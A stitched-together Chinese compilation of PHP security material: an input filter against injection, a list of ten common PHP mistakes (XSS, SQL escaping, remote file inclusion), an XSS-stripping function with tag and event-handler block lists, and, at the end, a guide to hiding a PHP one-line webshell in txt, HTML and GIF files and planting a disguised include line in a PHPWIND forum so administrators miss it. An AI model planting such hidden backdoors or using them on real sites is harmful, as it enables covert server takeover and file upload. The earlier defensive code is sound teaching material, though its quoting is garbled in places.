php 防注入

<?php
/*************************
说明：
判断传递的变量中是否含有非法字符
如$_POST、$_GET
功能：
防注入
**************************/
//要过滤的非法字符
$ArrFiltrate=array("''''",";","union");
//出错后要跳转的url,不填则默认前一页
$StrGoUrl="";
//是否存在数组中的值
function FunStringExist($StrFiltrate,$ArrFiltrate){
foreach ($ArrFiltrate as $key=>$value){
    if (eregi($value,$StrFiltrate)){
        return true;
    }
  }
return false;
}
//合并$_POST 和 $_GET
if(function_exists(array_merge)){
    $ArrPostAndGet=array_merge($HTTP_POST_VARS,$HTTP_GET_VARS);
}else{
    foreach($HTTP_POST_VARS as $key=>$value){
        $ArrPostAndGet[]=$value;
    }
    foreach($HTTP_GET_VARS as $key=>$value){
        $ArrPostAndGet[]=$value;
    }
}
//验证开始
foreach($ArrPostAndGet as $key=>$value){
    if (FunStringExist($value,$ArrFiltrate)){
        echo "<script language="javascript">alert("非法字符");</script>";
        if (empty($StrGoUrl)){
        echo "<script language="javascript">history.go(-1);</script>";
        }else{
        echo "<script language="javascript">window.location="".$StrGoUrl."";</script>";
        }
        exit;
    }
}
?>

保存为checkpostandget.php
然后在每个php文件前加include(“checkpostandget.php“);即可
 

PHP程序员最易犯10种错误(转)
PHP是个伟大的web开发语言，灵活的语言，但是看到php程序员周而复始的犯的一些错误。我做了下面这个列表，列出了PHP程序员经常犯的10中错误，大多数和安全相关。看看你犯了几种

1.不转意html entities

 

  一个基本的常识：所有不可信任的输入（特别是用户从form中提交的数据） ，输出之前都要转意。

 

echo $_GET['usename'] ;

 

这个例子有可能输出：

 

<script>/*更改admin密码的脚本或设置cookie的脚本*/</script>

 

这是一个明显的安全隐患，除非你保证你的用户都正确的输入。

 

如何修复 ：

 

我们需要将"< ",">","and" 等转换成正确的HTML表示(< , >', and ")，函数htmlspecialchars 和 htmlentities()正是干这个活的。

 

正确的方法：

 

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

 

 

2. 不转意SQL输入
我曾经在一篇文章中最简单的防止sql注入的方法(php+mysql中)讨论过这个问题并给出了一个简单的方法 。有人对我说，他们已经在php.ini中将magic_quotes设置为On，所以不必担心这个问题，但是不是所有的输入都是从$_GET, $_POST或 $_COOKIE中的得到的！
如何修复：

和在最简单的防止sql注入的方法(php+mysql中)中一样我还是推荐使用mysql_real_escape_string()函数

正确做法：
<?php
$sql = "UPDATE users SET
name='.mysql_real_escape_string($name).'
WHERE id='.mysql_real_escape_string ($id).'";
mysql_query($sql);
?>

 

 

3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie()
遇到过这个警告吗?"warning: Cannot add header information - headers already sent [....]

每次从服务器下载一个网页的时候，服务器的输出都分成两个部分：头部和正文。
头部包含了一些非可视的数据，例如cookie。头部总是先到达。正文部分包括可视的html，图片等数据。
如果output_buffering设置为Off，所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发，而在部署到另一个环境中去的时候，output_buffering的设置可能不一样。结果转向停止了，cookie和session都没有正确的设置........。

如何修复:
确保在输出之前调用http-header相关的函数，并且令output_buffering = Off
。

 

4. Require 或 include 的文件使用不安全的数据
再次强调：不要相信不是你自己显式声明的数据。不要 Include 或 require 从$_GET, $_POST 或 $_COOKIE 中得到的文件。

 

例如:
index.php
<?
//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>

 

现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt
来获取你的机密信息，或执行一个PHP脚本。

如果allow_url_fopen=On，你更是死定了：
试试这个输入：
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件，改变密码，删除文件等等。只要你能想得到。

如何修复：
你必须自己控制哪些文件可以包含在的include或require指令中。

下面是一个快速但不全面的解决方法：
<?
//Include only files that are allowed.
$allowedFiles = array('file1.txt','file2.txt','file3.txt');
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit('not allowed');
}
?>

 

5. 语法错误
语法错误包括所有的词法和语法错误，太常见了，以至于我不得不在这里列出。解决办法就是认真学习PHP的语法，仔细一点不要漏掉一个括号，大括号，分号，引号。还有就是换个好的编辑器，就不要用记事本了！

 

6.很少使用或不用面向对象
很多的项目都没有使用PHP的面向对象技术，结果就是代码的维护变得非常耗时耗力。PHP支持的面向对象技术越来越多，越来越好，我们没有理由不使用面向对象。

 

7. 不使用framework
95% 的PHP项目都在做同样的四件事: Create, edit, list 和delete. 现在有很多MVC的框架来帮我们完成这四件事，我们为何不使用他们呢？

 

 

8. 不知道PHP中已经有的功能
PHP的核心包含很多功能。很多程序员重复的发明轮子。浪费了大量时间。编码之前搜索一下PHP mamual，在google上检索一下，也许会有新的发现！PHP中的exec()是一个强大的函数，可以执行cmd shell，并把执行结果的最后一行以字符串的形式返回。考虑到安全可以使用EscapeShellCmd()

 

 

9.使用旧版本的PHP

很多程序员还在使用PHP4，在PHP4上开发不能充分发挥PHP的潜能，还存在一些安全的隐患。转到PHP5上来吧，并不费很多功夫。大部分PHP4程序只要改动很少的语句甚至无需改动就可以迁移到PHP5上来。根据http://www.nexen.net的调查 只有12%的PHP服务器使用PHP5，所以有88%的PHP开发者还在使用PHP4.

 

 

10.对引号做两次转意

见过网页中出现\'或\'"吗？这通常是因为在开发者的环境中magic_quotes 设置为off，而在部署的服务器上magic_quotes =on. PHP会在 GET, POST 和 COOKIE中的数据上重复运行addslashes() 。
原始文本：
It's a string

 

magic quotes on :
It\'s a string
又运行一次
addslashes():
It\\'s a string

 

HTML输出:
It\'s a string

还有一种情况就是，用户一开始输入了错误的登录信息，服务器检测到错误输入后，输出同样的form要求用户再次输入，导致用户的输入转意两次！

*
 字符串检查类
 *@author  sanshi
    QQ:35047205
    Email:sanshi0815@tom.com
    MSN:sanshi0815@tom.com

*/
class checkBase
{
 function checkBase()
 {
 }
 /*
 用来检查字符串是否为空
 *@param $str 检查的字段
 *@param $isStr 如果字段有可能唯一字符是数字或者bool类型时使用
 为空的时候返回true
 */
 function strIsNull($str,$isStr=true)
 {
  return $isStr?(empty($str)?true:false)
      :(isset($str)?false:true);
 }
 /*
 字符串与正则表达式做比较
 @param $str   要比较的字符串
 @param $pattern     要比对的正则
 与正则比对上了返回true
 */
 function strComparePattern($str,$pattern)
 {
  if(ereg($pattern,$str))
  {
   //找到了返回
   return true;
  }
  return false;
 }
 /*
 判断字符串长短
 @param $str 要检查的字符串
 @param $max 最大长度
 @param $min 最小长度
 符合要求返回true
 */
 function strCompareLen($str,$max,$min=1)
 {
  $len = strlen($str);
  $max=empty($max)?$len:$max;
  return ($len>$max || $len<$min)?false:true;
 }
 /*
 信息处理，跳转到页面
 @param $page     跳转到的页面   
 @param $msg      提示信息
 */
 function msg($page,$msg)
 {
  $msg = empty($msg)?'''''''':"?msg=".base64_encode($msg);
  $url=$page.$msg;
  if(@header("Location:".$url))
  {
     echo "<meta http-equiv=refresh content=''''0;url=".$url."''''>";
  }
  exit();
 }
 
}

 

如何攻击，在此不作说明（也不要问我），主要谈谈如何防范。首先，跨站脚本攻击都是由于对用户的输入没有进行严格的过滤造成的，所以我们必须在所有数据进入我们的网站和数据库之前把可能的危险拦截。针对非法的HTML代码包括单双引号等，可以使用htmlentities() 。

<?php
$str = "A ''''quote'''' is <b>bold</b>";

// Outputs: A ''''quote'''' is &lt;b&gt;bold&lt;/b&gt;
echo htmlentities($str);

// Outputs: A &#039;quote&#039; is &lt;b&gt;bold&lt;/b&gt;
echo htmlentities($str, ENT_QUOTES);
?>

这样可以使非法的脚本失效。
 
但是要注意一点，htmlentities()默认编码为 ISO-8859-1，如果你的非法脚本编码为其它，那么可能无法过滤掉，同时浏览器却可以识别和执行。这个问题我先找几个站点测试后再说。

这里提供一个过滤非法脚本的函数：

function RemoveXSS($val) {
   // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
   // this prevents some character re-spacing such as <java\0script>
   // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
   $val = preg_replace(''''/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/'''', '''''''', $val);
   
   // straight replacements, the user should never need these since they''''re normal characters
   // this prevents like <IMG SRC=&#X40&#X61&#X76&#X61&#X73&#X63&#X72&#X69&#X70&#X74&#X3A&#X61&#X6C&#X65&#X72&#X74&#X28&#X27&#X58&#X53&#X53&#X27&#X29>
   $search = ''''abcdefghijklmnopqrstuvwxyz'''';
   $search .= ''''ABCDEFGHIJKLMNOPQRSTUVWXYZ'''';
   $search .= ''''1234567890!@#$%^&*()'''';
   $search .= ''''~`";:?+/={}[]-_|\''''\\'''';
   for ($i = 0; $i < strlen($search); $i++) {
      // ;? matches the ;, which is optional
      // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars
   
      // &#x0040 @ search for the hex values
      $val = preg_replace(''''/(&#[x|X]0{0,8}''''.dechex(ord($search[$i])).'''';?)/i'''', $search[$i], $val); // with a ;
      // &#00064 @ 0{0,7} matches ''''0'''' zero to seven times
      $val = preg_replace(''''/(&#0{0,8}''''.ord($search[$i]).'''';?)/'''', $search[$i], $val); // with a ;
   }
   
   // now the only remaining whitespace attacks are \t, \n, and \r
   $ra1 = Array(''''javascript'''', ''''vbscript'''', ''''expression'''', ''''applet'''', ''''meta'''', ''''xml'''', ''''blink'''', ''''link'''', ''''style'''', ''''script'''', ''''embed'''', ''''object'''', ''''iframe'''', ''''frame'''', ''''frameset'''', ''''ilayer'''', ''''layer'''', ''''bgsound'''', ''''title'''', ''''base'''');
   $ra2 = Array(''''onabort'''', ''''onactivate'''', ''''onafterprint'''', ''''onafterupdate'''', ''''onbeforeactivate'''', ''''onbeforecopy'''', ''''onbeforecut'''', ''''onbeforedeactivate'''', ''''onbeforeeditfocus'''', ''''onbeforepaste'''', ''''onbeforeprint'''', ''''onbeforeunload'''', ''''onbeforeupdate'''', ''''onblur'''', ''''onbounce'''', ''''oncellchange'''', ''''onchange'''', ''''onclick'''', ''''oncontextmenu'''', ''''oncontrolselect'''', ''''oncopy'''', ''''oncut'''', ''''ondataavailable'''', ''''ondatasetchanged'''', ''''ondatasetcomplete'''', ''''ondblclick'''', ''''ondeactivate'''', ''''ondrag'''', ''''ondragend'''', ''''ondragenter'''', ''''ondragleave'''', ''''ondragover'''', ''''ondragstart'''', ''''ondrop'''', ''''onerror'''', ''''onerrorupdate'''', ''''onfilterchange'''', ''''onfinish'''', ''''onfocus'''', ''''onfocusin'''', ''''onfocusout'''', ''''onhelp'''', ''''onkeydown'''', ''''onkeypress'''', ''''onkeyup'''', ''''onlayoutcomplete'''', ''''onload'''', ''''onlosecapture'''', ''''onmousedown'''', ''''onmouseenter'''', ''''onmouseleave'''', ''''onmousemove'''', ''''onmouseout'''', ''''onmouseover'''', ''''onmouseup'''', ''''onmousewheel'''', ''''onmove'''', ''''onmoveend'''', ''''onmovestart'''', ''''onpaste'''', ''''onpropertychange'''', ''''onreadystatechange'''', ''''onreset'''', ''''onresize'''', ''''onresizeend'''', ''''onresizestart'''', ''''onrowenter'''', ''''onrowexit'''', ''''onrowsdelete'''', ''''onrowsinserted'''', ''''onscroll'''', ''''onselect'''', ''''onselectionchange'''', ''''onselectstart'''', ''''onstart'''', ''''onstop'''', ''''onsubmit'''', ''''onunload'''');
   $ra = array_merge($ra1, $ra2);
   
   $found = true; // keep replacing as long as the previous round replaced something
   while ($found == true) {
      $val_before = $val;
      for ($i = 0; $i < sizeof($ra); $i++) {
         $pattern = ''''/'''';
         for ($j = 0; $j < strlen($ra[$i]); $j++) {
            if ($j > 0) {
               $pattern .= ''''('''';
               $pattern .= ''''(&#[x|X]0{0,8}([9][a][b]);?)?'''';
               $pattern .= ''''|(&#0{0,8}([9][10][13]);?)?'''';
               $pattern .= '''')?'''';
            }
            $pattern .= $ra[$i][$j];
         }
         $pattern .= ''''/i'''';
         $replacement = substr($ra[$i], 0, 2).''''<x>''''.substr($ra[$i], 2); // add in <> to nerf the tag
         $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
         if ($val_before == $val) {
            // no replacements were made, so exit the loop
            $found = false;
         }
      }
   }
}

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里，其实把一句话木马插入到PHP文件中就已经很隐蔽了，如果说硬是要放到HTML文件或图片里，就接着往下看的这篇测试报告吧。
 
要知道如果光把PHP语句放到图片里是无论如何也不能执行的，因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 ：include 、require 等。

 

我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数，这就使得插入木马的性能得不到发挥。 Chinaz

Include 函数在PHP中使用的比较频繁，所以引起的安全问题也实在太多，例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里，可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句：

 

＜‘’？@include includ/.$PHPWIND_ROOT；？ ＞ 站.长站

一般管理员是无法看出来的。 Chinaz

有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了，下面我们就依次来做测试。 中国站.长.站

首先建立一PHP文件test.php 文件内容为：

以下为引用的内容：     $test=$_GET['test']；     @include 'test/'.$test     ？＞

Chinaz@com

Txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问 hxxp://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了， 然后把在lanker微型PHP后门客户端 木马地址添入 hxxp://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了，执行返回的结果都可以看到。

 

对于HTML的文件，一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来，我们可以在HTML里加入一个隐藏属性的文本框 ，如： 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 我可以得到目录为 C:\Uniserver2_7s\www\test。 Www~Chinaz~com

下面我们说说图片文件，要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑，把插入到图片末尾

 

经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入 

我们查看PHP环境变量 返回的是结果是原图片。

 

这里可能要和我们想象的结果有些差距了，其实命令已经运行了，只是返回的结果看不到而已，因为这是真正的GIF文件，所以是不会显示返回结果的，为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料，文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果，那就拿出记事本伪造一个假的图片文件吧。